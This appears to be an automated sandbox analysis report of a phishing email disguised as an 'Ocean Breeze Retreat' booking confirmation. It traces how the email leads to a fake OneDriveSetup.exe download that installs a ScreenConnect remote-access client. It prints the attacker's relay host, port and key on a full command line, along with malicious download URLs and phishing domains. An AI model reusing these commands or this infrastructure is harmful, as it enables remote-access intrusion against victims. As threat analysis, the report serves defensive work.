Windows Analysis Report
Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg

Overview

General Information

Sample name: Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
Analysis ID: 1632450
MD5: 3a01d6a3cf44ee40632cdb0b40c36624
SHA1: 13993d0144d3136e7ad9082e65450db0e1c12f03
SHA256: 3bbc9f13f9ed9195ed633f8fa78be3ccc3336934ba79954a31cca0daba6b4158

Detection

ScreenConnect Tool
Score: 76
Range: 0 - 100
Confidence: 100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious elements in Email content
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

[Classification chart, image not reproduced. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious.]
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6892 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "45AE51B9-404E-41AC-B6B3-06509E284573" "2B13D4B0-6C0C-40D8-AAB1-E470D827B26A" "6892" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 7336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,4087323018114762375,9119903113655532610,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • OneDriveSetup (1).exe (PID: 2004 cmdline: "C:\Users\user\Downloads\OneDriveSetup (1).exe" MD5: 911525671C9FD23005A07459B729B754)
        • msiexec.exe (PID: 1760 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • chrome.exe (PID: 7404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HxOutlook.exe (PID: 6564 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca MD5: 6F8EAC2C377C8F16D91CB5AC8B8DBF5F)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2340 cmdline: C:\Windows\System32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6184 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2588 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6428 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HxAccounts.exe (PID: 7172 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca MD5: 6FEB00C9A2C3FF66230658B3012BAB6A)
  • svchost.exe (PID: 7404 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7440 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 2660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0F46587D044F7C61BD85AC8DFD726F62 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 8152 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 2112 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 031E0E48DE3D13F9D2BD5DCF3BCB9F6E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3488 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 92F38BA88A466C77B1F7FCBAC077F3D4 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 772 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=" MD5: D3E628C507DC331BAB3DE1178088C978)
    • ScreenConnect.WindowsClient.exe (PID: 3096 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "9f785d80-c7b6-460e-b2b7-083465355376" "User" MD5: AFA993C978BC52D51E8AF08A02892B4E)
    • ScreenConnect.WindowsClient.exe (PID: 4600 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "685ea6e3-f4f1-4a5d-b64b-7c74b24aed78" "System" MD5: AFA993C978BC52D51E8AF08A02892B4E)
  • WINWORD.EXE (PID: 5476 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • sppsvc.exe (PID: 5112 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • mmc.exe (PID: 7992 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
  • mmc.exe (PID: 980 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc" MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
  • cleanup
Source | Rule | Description | Author | Strings
C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\Downloads\Unconfirmed 111805.crdownload | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFD365F17729FDCDF2.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Installer\inprogressinstallinfo.ipi | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFCA3227996840FADD.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000013.00000000.1809633017.0000000000446000.00000002.00000001.01000000.0000000D.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000013.00000002.1834609850.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000001D.00000000.1894571066.0000000000D42000.00000002.00000001.01000000.0000001A.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000013.00000002.1838178371.00000000079F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000013.00000002.1827940305.0000000003371000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" 
"?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c=", ProcessId: 772, ProcessName: ScreenConnect.ClientService.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: ScreenConnect Client (d241e538b9eb3f0a) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 2660, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-13DB-35F7EAAA7A38}\(Default)
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc, ProcessId: 6260, ProcessName: svchost.exe
No Suricata rule has matched

Phishing

Source: https://bookingmanageview.com/lnvoice/B-37288321/ | Joe Sandbox AI: Page contains button: 'Redownload Document' Source: '1.3.pages.csv'
Source: Email | Joe Sandbox AI: Detected potential phishing email: The sender email domain is highly suspicious and does not match the claimed Ocean Breeze business (uses a long, random-looking salesforce subdomain). The email contains multiple tracking and redirect links with suspicious domains (cl.s12.exct.net). Despite appearing professional, the email uses pressure tactics and includes clickable links for reservation management, which is typical of phishing attempts
Source: https://bookingmanageview.com/lnvoice/B-37288321/ | HTTP Parser: Base64 decoded: 1741386798.000000
Source: Email | Classification: Credential Stealer
Source: https://oceanbreeze.com/lander | HTTP Parser: No favicon
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\svchost.exe | File opened: d:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\mmc.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: chrome.exe | Memory has grown: Private usage: 7MB later: 38MB

Networking

Source: C:\Windows\System32\msiexec.exe | Registry value created: NULL Service
Source: global traffic | TCP traffic: 192.168.2.16:49781 -> 199.127.62.110:8041
Source: global traffic | TCP traffic: 192.168.2.16:49818 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | HTTP traffic: Redirect from: cl.s12.exct.net to https://skillsyne.us/mymanagedtl
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: bitbucket.org to https://bbuseruploads.s3.amazonaws.com/7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/onedrivesetup.exe?response-content-disposition=attachment%3b%20filename%3d%22onedrivesetup.exe%22&awsaccesskeyid=asia6kose3bnoi3awrxw&signature=uvjrf4lpfl%2bobrztrgtqpwq4jcq%3d&x-amz-security-token=iqojb3jpz2lux2vjeacacxvzlwvhc3qtmsjhmeuciqcgmsplx0uw72pgadtpc1xfeekgv0nryuqpnwqyywcxkqigendcid7amnuaespseefl3yhgzqp3tu3zifxt8245m9gqpwiiubaaggw5odq1mjuxmdexndyidcmvxvvrmzlgfck5xcqeaqm27j2pvy4pvbh0tzdiyo4unrvpedazerhma86uiviegfs3oegofnwhjufwlhekxwgq4qu3xn9ajo7xm3naiz8xhgd8p0p7aakvvoqw0wc%2fa6dnll6ry%2bm6y%2foiid0ixdjkj46sfuujanfv0bgmh%2f%2bypaogbd15edbfz4%2fb6b7pza6xhro70ujqnr9uvbumywb3nloohu%2b3kcz4hlo81g4r9errk3xkxq3ig4kjurkvlpenda80mbxrkqtgsrsbor9jr4vocvcakgrez2cxtuxiida2snlwcumk05m9njwzvm4k%2fb3uvzyotwnw1tjpfvk21seiu4asfgz3sn0g4zzrpbhhmilorb4gop0bwr%2bxptm3uwqjqz7n5oep1ydm07iivzkspcbullyi9ee9kqut6pj6cknfg1rgrkbnzgks6gmyziyewt7hewlhtsqqzui%2ftv2mua%2br1pzk%2byculq2fzead2spgi0mseuprevu2rlmoc6m%2bifhm8d6wa6c%2bsw2bjedblgjmf2lgv28%2bev8qu9m1uxxe1bmgdogsg7ffpqhjagdcyklkcw%3d%3d&expires=1741388554
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | HTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: global trafficHTTP traffic detected: GET /?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547 HTTP/1.1Host: cl.s12.exct.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.&oit=1&cp=12&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=oceanbreeze.com&oit=3&cp=15&pgcl=7&gs_rn=42&psi=Ta3SbLoPbtz4sM0f&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
